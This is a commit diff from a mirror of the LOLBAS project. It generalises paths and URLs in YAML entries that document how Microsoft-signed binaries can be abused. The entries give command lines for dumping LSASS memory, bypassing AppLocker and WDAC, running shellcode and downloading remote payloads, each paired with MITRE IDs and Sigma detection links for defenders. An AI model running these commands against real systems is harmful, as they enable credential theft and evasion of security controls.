public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-07-27 04:32:24 +02:00
Code Issues Projects Releases Wiki Activity

Generalising file paths and urls, see #10 (#422)

Browse Source
This commit is contained in:
Wietze
2025-01-28 11:15:01 +00:00
committed by GitHub
parent e62749f81a
commit a79893e7ad
196 changed files with 555 additions and 758 deletions
Download Patch File Download Diff File Expand all files Collapse all files

6
yml/OtherMSBinaries/AccCheckConsole.yml
View File

@@ -1,10 +1,10 @@
---
Name: AccCheckConsole.exe
Description: Verifies UI accessibility requirements
Author: 'bohops'
Author: bohops
Created: 2022-01-02
Commands:
- Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll
- Command: AccCheckConsole.exe -window "Untitled - Notepad" {PATH_ABSOLUTE:.dll}
Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.
Usecase: Local execution of managed code from assembly DLL.
Category: Execute
@@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: DLL (.NET)
- Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll
- Command: AccCheckConsole.exe -window "Untitled - Notepad" {PATH_ABSOLUTE:.dll}
Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.
Usecase: Local execution of managed code to bypass AppLocker.
Category: AWL Bypass

8
yml/OtherMSBinaries/Adplus.yml
View File

@@ -4,14 +4,14 @@ Description: Debugging tool included with Windows Debugging Tools
Author: mr.d0x
Created: 2021-09-01
Commands:
- Command: adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet
- Command: adplus.exe -hang -pn lsass.exe -o {PATH_ABSOLUTE:folder} -quiet
Description: Creates a memory dump of the lsass process
Usecase: Create memory dump and parse it offline
Category: Dump
Privileges: SYSTEM
MitreID: T1003.001
OperatingSystem: All Windows
- Command: adplus.exe -c config-adplus.xml
- Command: adplus.exe -c {PATH:.xml}
Description: Execute arbitrary commands using adplus config file (see Resources section for a sample file).
Usecase: Run commands under a trusted Microsoft signed binary
Category: Execute
@@ -20,14 +20,14 @@ Commands:
OperatingSystem: All Windows
Tags:
- Execute: CMD
- Command: adplus.exe -c config-adplus.xml
- Command: adplus.exe -c {PATH:.xml}
Description: Dump process memory using adplus config file (see Resources section for a sample file).
Usecase: Run commands under a trusted Microsoft signed binary
Category: Dump
Privileges: SYSTEM
MitreID: T1003.001
OperatingSystem: All Windows
- Command: adplus.exe -crash -o "C:\temp\" -sc calc.exe
- Command: adplus.exe -crash -o "{PATH_ABSOLUTE:folder}" -sc {PATH:.exe}
Description: Execute arbitrary commands and binaries from the context of adplus. Note that providing an output directory via '-o' is required.
Usecase: Run commands under a trusted Microsoft signed binary
Category: Execute

10
yml/OtherMSBinaries/Agentexecutor.yml
View File

@@ -1,10 +1,10 @@
---
Name: AgentExecutor.exe
Description: Intune Management Extension included on Intune Managed Devices
Author: 'Eleftherios Panos'
Author: Eleftherios Panos
Created: 2020-07-23
Commands:
- Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\Windows\SysWOW64\WindowsPowerShell\v1.0" 0 1
- Command: AgentExecutor.exe -powershell "{PATH_ABSOLUTE:.ps1}" "{PATH_ABSOLUTE:.1.log}" "{PATH_ABSOLUTE:.2.log}" "{PATH_ABSOLUTE:.3.log}" 60000 "C:\Windows\SysWOW64\WindowsPowerShell\v1.0" 0 1
Description: Spawns powershell.exe and executes a provided powershell script with ExecutionPolicy Bypass argument
Usecase: Execute unsigned powershell scripts
Category: Execute
@@ -13,8 +13,8 @@ Commands:
OperatingSystem: Windows 10
Tags:
- Execute: PowerShell
- Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1
Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully
- Command: AgentExecutor.exe -powershell "{PATH_ABSOLUTE:.ps1}" "{PATH_ABSOLUTE:.1.log}" "{PATH_ABSOLUTE:.2.log}" "{PATH_ABSOLUTE:.3.log}" 60000 "{PATH_ABSOLUTE:folder}" 0 1
Description: If we place a binary named powershell.exe in the specified folder path, agentexecutor.exe will execute it successfully
Usecase: Execute a provided EXE
Category: Execute
Privileges: User
@@ -24,8 +24,6 @@ Commands:
- Execute: EXE
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Intune Management Extension\AgentExecutor.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml

4
yml/OtherMSBinaries/Appcert.yml
View File

@@ -4,7 +4,7 @@ Description: Windows App Certification Kit command-line tool.
Author: Avihay Eldad
Created: 2024-03-06
Commands:
- Command: appcert.exe test -apptype desktop -setuppath c:\windows\system32\notepad.exe -reportoutputpath c:\users\public\output.xml
- Command: appcert.exe test -apptype desktop -setuppath {PATH_ABSOLUTE:.exe} -reportoutputpath {PATH_ABSOLUTE:.xml}
Description: Execute an executable file via the Windows App Certification Kit command-line tool.
Usecase: Performs execution of specified file, can be used as a defense evasion
Category: Execute
@@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: EXE
- Command: appcert.exe test -apptype desktop -setuppath c:\users\public\malicious.msi -setupcommandline /q -reportoutputpath c:\users\public\output.xml
- Command: appcert.exe test -apptype desktop -setuppath {PATH_ABSOLUTE:.msi} -setupcommandline /q -reportoutputpath {PATH_ABSOLUTE:.xml}
Description: Install an MSI file via an msiexec instance spawned via appcert.exe as parent process.
Usecase: Execute custom made MSI file with malicious code
Category: Execute

17
yml/OtherMSBinaries/Appvlp.yml
View File

@@ -1,28 +1,19 @@
---
Name: Appvlp.exe
Description: Application Virtualization Utility Included with Microsoft Office 2016
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: AppVLP.exe \\webdav\calc.bat
- Command: AppVLP.exe {PATH_SMB:.bat}
Usecase: Execution of BAT file hosted on Webdav server.
Description: Executes calc.bat through AppVLP.exe
Description: Executes .bat file through AppVLP.exe
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 w/Office 2016
Tags:
- Execute: CMD
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 w/Office 2016
Tags:
- Execute: EXE
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('{PATH:.exe}','', '', 'open', 1)"
Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
Category: Execute

18
yml/OtherMSBinaries/Bginfo.yml
View File

@@ -1,11 +1,11 @@
---
Name: Bginfo.exe
Description: Background Information Utility included with SysInternals Suite
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: bginfo.exe bginfo.bgi /popup /nolicprompt
Description: Execute VBscript code that is referenced within the bginfo.bgi file.
- Command: bginfo.exe {PATH:.bgi} /popup /nolicprompt
Description: Execute VBscript code that is referenced within the specified .bgi file.
Usecase: Local execution of VBScript
Category: Execute
Privileges: User
@@ -13,8 +13,8 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: WSH
- Command: bginfo.exe bginfo.bgi /popup /nolicprompt
Description: Execute VBscript code that is referenced within the bginfo.bgi file.
- Command: bginfo.exe {PATH:.bgi} /popup /nolicprompt
Description: Execute VBscript code that is referenced within the specified .bgi file.
Usecase: Local execution of VBScript
Category: AWL Bypass
Privileges: User
@@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: WSH
- Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
- Command: \\10.10.10.10\webdav\bginfo.exe {PATH:.bgi} /popup /nolicprompt
Usecase: Remote execution of VBScript
Description: Execute bginfo.exe from a WebDAV server.
Category: Execute
@@ -31,7 +31,7 @@ Commands:
Tags:
- Execute: WSH
OperatingSystem: Windows
- Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
- Command: \\10.10.10.10\webdav\bginfo.exe {PATH:.bgi} /popup /nolicprompt
Usecase: Remote execution of VBScript
Description: Execute bginfo.exe from a WebDAV server.
Category: AWL Bypass
@@ -40,7 +40,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: WSH
- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
- Command: \\live.sysinternals.com\Tools\bginfo.exe {PATH_SMB:.bgi} /popup /nolicprompt
Usecase: Remote execution of VBScript
Description: This style of execution may not longer work due to patch.
Category: Execute
@@ -50,7 +50,7 @@ Commands:
Tags:
- Execute: WSH
- Execute: Remote
- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
- Command: \\live.sysinternals.com\Tools\bginfo.exe {PATH_SMB:.bgi} /popup /nolicprompt
Usecase: Remote execution of VBScript
Description: This style of execution may not longer work due to patch.
Category: AWL Bypass

10
yml/OtherMSBinaries/Cdb.yml
View File

@@ -4,8 +4,8 @@ Description: Debugging tool included with Windows Debugging Tools.
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: cdb.exe -cf x64_calc.wds -o notepad.exe
Description: Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe.
- Command: cdb.exe -cf {PATH:.wds} -o notepad.exe
Description: Launch 64-bit shellcode from the specified .wds file using cdb.exe.
Usecase: Local execution of assembly shellcode.
Category: Execute
Privileges: User
@@ -14,8 +14,8 @@ Commands:
Tags:
- Execute: Shellcode
- Command: |
cdb.exe -pd -pn <process_name>
.shell <cmd>
cdb.exe -pd -pn {process_name}
.shell {CMD}
Description: Attaching to any process and executing shell commands.
Usecase: Run a shell command under a trusted Microsoft signed binary
Category: Execute
@@ -24,7 +24,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: CMD
- Command: cdb.exe -c C:\debug-script.txt calc
- Command: cdb.exe -c {PATH:.txt} "{CMD}"
Description: Execute arbitrary commands and binaries using a debugging script (see Resources section for a sample file).
Usecase: Run commands under a trusted Microsoft signed binary
Category: Execute

6
yml/OtherMSBinaries/Coregen.yml
View File

@@ -4,7 +4,7 @@ Description: Binary coregen.exe (Microsoft CoreCLR Native Image Generator) loads
Author: Martin Sohn Christensen
Created: 2020-10-09
Commands:
- Command: coregen.exe /L C:\folder\evil.dll dummy_assembly_name
- Command: coregen.exe /L {PATH_ABSOLUTE:.dll} dummy_assembly_name
Description: Loads the target .DLL in arbitrary path specified with /L.
Usecase: Execute DLL code
Category: Execute
@@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: DLL
- Command: coregen.exe /L C:\folder\evil.dll dummy_assembly_name
- Command: coregen.exe /L {PATH_ABSOLUTE:.dll} dummy_assembly_name
Description: Loads the target .DLL in arbitrary path specified with /L. Since binary is signed it can also be used to bypass application whitelisting solutions.
Usecase: Execute DLL code
Category: AWL Bypass
@@ -34,8 +34,6 @@ Commands:
Full_Path:
- Path: C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe
- Path: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/image_load/image_load_side_load_coregen.yml
- IOC: coregen.exe loading .dll file not in "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\"

2
yml/OtherMSBinaries/Createdump.yml
View File

@@ -4,7 +4,7 @@ Description: Microsoft .NET Runtime Crash Dump Generator (included in .NET Core)
Author: mr.d0x, Daniel Santos
Created: 2022-01-20
Commands:
- Command: createdump.exe -n -f dump.dmp [PID]
- Command: createdump.exe -n -f {PATH:.dmp} {PID}
Description: Dump process by PID and create a minidump file. If "-f dump.dmp" is not specified, the file is created as '%TEMP%\dump.%p.dmp' where %p is the PID of the target process.
Usecase: Dump process memory contents using PID.
Category: Dump

6
yml/OtherMSBinaries/Csi.yml
View File

@@ -1,10 +1,10 @@
---
Name: csi.exe
Description: Command line interface included with Visual Studio.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: csi.exe file
- Command: csi.exe {PATH:.cs}
Description: Use csi.exe to run unsigned C# code.
Usecase: Local execution of unsigned C# code.
Category: Execute
@@ -16,8 +16,6 @@ Commands:
Full_Path:
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe
- Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_csi_use_of_csharp_console.yml

6
yml/OtherMSBinaries/DefaultPack.yml
View File

@@ -1,10 +1,10 @@
---
Name: DefaultPack.EXE
Description: This binary can be downloaded along side multiple software downloads on the microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider.
Description: This binary can be downloaded along side multiple software downloads on the Microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider.
Author: '@checkymander'
Created: 2020-10-01
Commands:
- Command: DefaultPack.EXE /C:"process.exe args"
- Command: DefaultPack.EXE /C:"{CMD}"
Description: Use DefaultPack.EXE to execute arbitrary binaries, with added argument support.
Usecase: Can be used to execute stagers, binaries, and other malicious commands.
Category: Execute
@@ -15,8 +15,6 @@ Commands:
- Execute: CMD
Full_Path:
- Path: C:\Program Files (x86)\Microsoft\DefaultPack\DefaultPack.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_lolbin_defaultpack.yml
- IOC: DefaultPack.EXE spawned an unknown process

2
yml/OtherMSBinaries/Devinit.yml
View File

@@ -4,7 +4,7 @@ Description: Visual Studio 2019 tool
Author: mr.d0x
Created: 2022-01-20
Commands:
- Command: devinit.exe run -t msi-install -i https://example.com/out.msi
- Command: devinit.exe run -t msi-install -i {REMOTEURL:.msi}
Description: Downloads an MSI file to C:\Windows\Installer and then installs it.
Usecase: Executes code from a (remote) MSI file.
Category: Execute

8
yml/OtherMSBinaries/Devtoolslauncher.yml
View File

@@ -1,10 +1,10 @@
---
Name: Devtoolslauncher.exe
Description: Binary will execute specified binary. Part of VS/VScode installation.
Author: 'felamos'
Author: felamos
Created: 2019-10-04
Commands:
- Command: devtoolslauncher.exe LaunchForDeploy [PATH_TO_BIN] "argument here" test
- Command: devtoolslauncher.exe LaunchForDeploy {PATH_ABSOLUTE:.exe} "{CMD:args}" test
Description: The above binary will execute other binary.
Usecase: Execute any binary with given arguments and it will call developertoolssvc.exe. developertoolssvc is actually executing the binary.
Category: Execute
@@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows 7 and up with VS/VScode installed
Tags:
- Execute: CMD
- Command: devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test
- Command: devtoolslauncher.exe LaunchForDebug {PATH_ABSOLUTE:.exe} "{CMD:args}" test
Description: The above binary will execute other binary.
Usecase: Execute any binary with given arguments.
Category: Execute
@@ -24,8 +24,6 @@ Commands:
- Execute: CMD
Full_Path:
- Path: 'c:\windows\system32\devtoolslauncher.exe'
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml
- IOC: DeveloperToolsSvc.exe spawned an unknown process

10
yml/OtherMSBinaries/Dnx.yml
View File

@@ -1,11 +1,11 @@
---
Name: dnx.exe
Description: .Net Execution environment file included with .Net.
Author: 'Oddvar Moe'
Description: .NET Execution environment file included with .NET.
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: dnx.exe consoleapp
Description: Execute C# code located in the consoleapp folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies)
- Command: dnx.exe {PATH_ABSOLUTE:folder}
Description: Execute C# code located in the specified folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies)
Usecase: Local execution of C# project stored in consoleapp folder.
Category: Execute
Privileges: User
@@ -15,8 +15,6 @@ Commands:
- Execute: CSharp
Full_Path:
- Path: no default
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dnx.yml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml

10
yml/OtherMSBinaries/Dotnet.yml
View File

@@ -1,11 +1,11 @@
---
Name: Dotnet.exe
Description: dotnet.exe comes with .NET Framework
Author: 'felamos'
Author: felamos
Created: 2019-11-12
Commands:
- Command: dotnet.exe [PATH_TO_DLL]
Description: dotnet.exe will execute any dll even if applocker is enabled.
- Command: dotnet.exe {PATH:.dll}
Description: dotnet.exe will execute any DLL even if applocker is enabled.
Usecase: Execute code bypassing AWL
Category: AWL Bypass
Privileges: User
@@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows 7 and up with .NET installed
Tags:
- Execute: DLL (.NET)
- Command: dotnet.exe [PATH_TO_DLL]
- Command: dotnet.exe {PATH:.dll}
Description: dotnet.exe will execute any DLL.
Usecase: Execute DLL
Category: Execute
@@ -31,7 +31,7 @@ Commands:
OperatingSystem: Windows 10 and up with .NET SDK installed
Tags:
- Execute: FSharp
- Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ]
- Command: dotnet.exe msbuild {PATH:.csproj}
Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code
Usecase: Execute code bypassing AWL
Category: AWL Bypass

2
yml/OtherMSBinaries/Dsdbutil.yml
View File

@@ -44,8 +44,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\dsdbutil.exe
- Path: C:\Windows\SysWOW64\dsdbutil.exe
Code_Sample:
- Code:
Detection:
- IOC: Event ID 4688
- IOC: dsdbutil.exe process creation

2
yml/OtherMSBinaries/Dtutil.yml
View File

@@ -4,7 +4,7 @@ Description: Microsoft command line utility used to manage SQL Server Integratio
Author: Avihay Eldad
Created: 2024-06-17
Commands:
- Command: dtutil.exe /FILE C:\Windows\System32\calc.exe /COPY FILE;C:\Users\Public\calc.exe
- Command: dtutil.exe /FILE {PATH_ABSOLUTE:.source.ext} /COPY FILE;{PATH_ABSOLUTE:.dest.ext}
Description: Copy file from source to destination
Usecase: Use to copies the source file to the destination file
Category: Copy

2
yml/OtherMSBinaries/Dump64.yml
View File

@@ -4,7 +4,7 @@ Description: Memory dump tool that comes with Microsoft Visual Studio
Author: mr.d0x
Created: 2021-11-16
Commands:
- Command: dump64.exe <pid> out.dmp
- Command: dump64.exe {PID} out.dmp
Description: Creates a memory dump of the LSASS process.
Usecase: Create memory dump and parse it offline to retrieve credentials.
Category: Dump

2
yml/OtherMSBinaries/DumpMinitool.yml
View File

@@ -4,7 +4,7 @@ Description: Dump tool part Visual Studio 2022
Author: mr.d0x
Created: 2022-01-20
Commands:
- Command: DumpMinitool.exe --file c:\users\mr.d0x\dump.txt --processId 1132 --dumpType Full
- Command: DumpMinitool.exe --file {PATH_ABSOLUTE} --processId 1132 --dumpType Full
Description: Creates a memory dump of the lsass process
Usecase: Create memory dump and parse it offline
Category: Dump

6
yml/OtherMSBinaries/Dxcap.yml
View File

@@ -1,11 +1,11 @@
---
Name: Dxcap.exe
Description: DirectX diagnostics/debugger included with Visual Studio.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: Dxcap.exe -c C:\Windows\System32\notepad.exe
Description: 'Launch notepad.exe as a subprocess of dxcap.exe. Note that you should have write permissions in the current working directory for the command to succeed; alternatively, add ''-file c:\path\to\writable\location.ext'' as first argument.'
- Command: Dxcap.exe -c {PATH_ABSOLUTE:.exe}
Description: 'Launch specified executable as a subprocess of dxcap.exe. Note that you should have write permissions in the current working directory for the command to succeed; alternatively, add ''-file c:\path\to\writable\location.ext'' as first argument.'
Usecase: Local execution of a process as a subprocess of dxcap.exe
Category: Execute
Privileges: User

4
yml/OtherMSBinaries/Excel.yml
View File

@@ -4,7 +4,7 @@ Description: Microsoft Office binary
Author: 'Reegun J (OCBC Bank)'
Created: 2019-07-19
Commands:
- Command: Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
- Command: Excel.exe {REMOTEURL}
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in INetCache.
Category: Download
@@ -29,8 +29,6 @@ Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office\Office12\Excel.exe
- Path: C:\Program Files\Microsoft Office\Office12\Excel.exe
- Path: C:\Program Files\Microsoft Office\Office12\Excel.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_office.yml
- IOC: Suspicious Office application Internet/network traffic

2
yml/OtherMSBinaries/Fsi.yml
View File

@@ -4,7 +4,7 @@ Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotN
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: fsi.exe c:\path\to\test.fsscript
- Command: fsi.exe {PATH:.fsscript}
Description: Execute F# code via script file
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass

2
yml/OtherMSBinaries/FsiAnyCpu.yml
View File

@@ -4,7 +4,7 @@ Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio.
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: fsianycpu.exe c:\path\to\test.fsscript
- Command: fsianycpu.exe {PATH:.fsscript}
Description: Execute F# code via script file
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass

17
yml/OtherMSBinaries/Mftrace.yml
View File

@@ -1,11 +1,11 @@
---
Name: Mftrace.exe
Description: Trace log generation tool for Media Foundation Tools.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: Mftrace.exe cmd.exe
Description: Launch cmd.exe as a subprocess of Mftrace.exe.
- Command: Mftrace.exe {PATH:.exe}
Description: Launch specified executable as a subprocess of Mftrace.exe.
Usecase: Local execution of cmd.exe as a subprocess of Mftrace.exe.
Category: Execute
Privileges: User
@@ -13,22 +13,11 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: EXE
- Command: Mftrace.exe powershell.exe
Description: Launch cmd.exe as a subprocess of Mftrace.exe.
Usecase: Local execution of powershell.exe as a subprocess of Mftrace.exe.
Category: Execute
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86\mftrace.exe
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64\mftrace.exe
- Path: C:\Program Files (x86)\Windows Kits\10\bin\x86\mftrace.exe
- Path: C:\Program Files (x86)\Windows Kits\10\bin\x64\mftrace.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml
Resources:

4
yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml
View File

@@ -4,8 +4,8 @@ Description: Part of the NodeJS Visual Studio tools.
Author: mr.d0x
Created: 2022-01-20
Commands:
- Command: Microsoft.NodejsTools.PressAnyKey.exe normal 1 cmd.exe
Description: Launch cmd.exe as a subprocess of Microsoft.NodejsTools.PressAnyKey.exe.
- Command: Microsoft.NodejsTools.PressAnyKey.exe normal 1 {PATH:.exe}
Description: Launch specified executable as a subprocess of Microsoft.NodejsTools.PressAnyKey.exe.
Usecase: Spawn a new process via Microsoft.NodejsTools.PressAnyKey.exe.
Category: Execute
Privileges: User

2
yml/OtherMSBinaries/Msaccess.yml
View File

@@ -4,7 +4,7 @@ Description: Microsoft Office component
Author: Nir Chako
Created: 2023-04-30
Commands:
- Command: MSAccess.exe https://example.com/payload.exe.mdb
- Command: MSAccess.exe {REMOTEURL}
Description: Downloads payload from remote server
Usecase: It will download a remote payload (if it has the filename extension .mdb) and place it in INetCache.
Category: Download

14
yml/OtherMSBinaries/Msdeploy.yml
View File

@@ -1,11 +1,11 @@
---
Name: Msdeploy.exe
Description: Microsoft tool used to deploy Web Applications.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"
Description: Launch calc.bat via msdeploy.exe.
- Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="{PATH_ABSOLUTE:.bat}"
Description: Launch .bat file via msdeploy.exe.
Usecase: Local execution of batch file using msdeploy.exe.
Category: Execute
Privileges: User
@@ -13,8 +13,8 @@ Commands:
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server
Tags:
- Execute: CMD
- Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"
Description: Launch calc.bat via msdeploy.exe.
- Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="{PATH_ABSOLUTE:.bat}"
Description: Launch .bat file via msdeploy.exe.
Usecase: Local execution of batch file using msdeploy.exe.
Category: AWL Bypass
Privileges: User
@@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server
Tags:
- Execute: CMD
- Command: msdeploy.exe -verb:sync -source:filePath=C:\windows\system32\calc.exe -dest:filePath=C:\Users\Public\calc.exe
- Command: msdeploy.exe -verb:sync -source:filePath={PATH_ABSOLUTE:.source.ext} -dest:filePath={PATH_ABSOLUTE:.dest.ext}
Description: Copy file from source to destination.
Usecase: Copy file.
Category: Copy
@@ -38,8 +38,6 @@ Full_Path:
- Path: C:\Program Files (x86)\IIS\Microsoft Web Deploy V4\msdeploy.exe
- Path: C:\Program Files\IIS\Microsoft Web Deploy V5\msdeploy.exe
- Path: C:\Program Files (x86)\IIS\Microsoft Web Deploy V5\msdeploy.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml
Resources:

2
yml/OtherMSBinaries/MsoHtmEd.yml
View File

@@ -4,7 +4,7 @@ Description: Microsoft Office component
Author: Nir Chako
Created: 2022-07-24
Commands:
- Command: MsoHtmEd.exe https://example.com/payload
- Command: MsoHtmEd.exe {REMOTEURL}
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in INetCache.
Category: Download

2
yml/OtherMSBinaries/Mspub.yml
View File

@@ -4,7 +4,7 @@ Description: Microsoft Publisher
Author: Nir Chako
Created: 2022-08-02
Commands:
- Command: mspub.exe https://example.com/payload
- Command: mspub.exe {REMOTEURL}
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in INetCache.
Category: Download

14
yml/OtherMSBinaries/Msxsl.yml
View File

@@ -1,10 +1,10 @@
---
Name: msxsl.exe
Description: Command line utility used to perform XSL transformations.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: msxsl.exe customers.xml script.xsl
- Command: msxsl.exe {PATH:.xml} {PATH:.xsl}
Description: Run COM Scriptlet code within the script.xsl file (local).
Usecase: Local execution of script stored in XSL file.
Category: Execute
@@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: XSL
- Command: msxsl.exe customers.xml script.xsl
- Command: msxsl.exe {PATH:.xml} {PATH:.xsl}
Description: Run COM Scriptlet code within the script.xsl file (local).
Usecase: Local execution of script stored in XSL file.
Category: AWL Bypass
@@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: XSL
- Command: msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
- Command: msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl}
Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
Usecase: Local execution of remote script stored in XSL script stored as an XML file.
Category: Execute
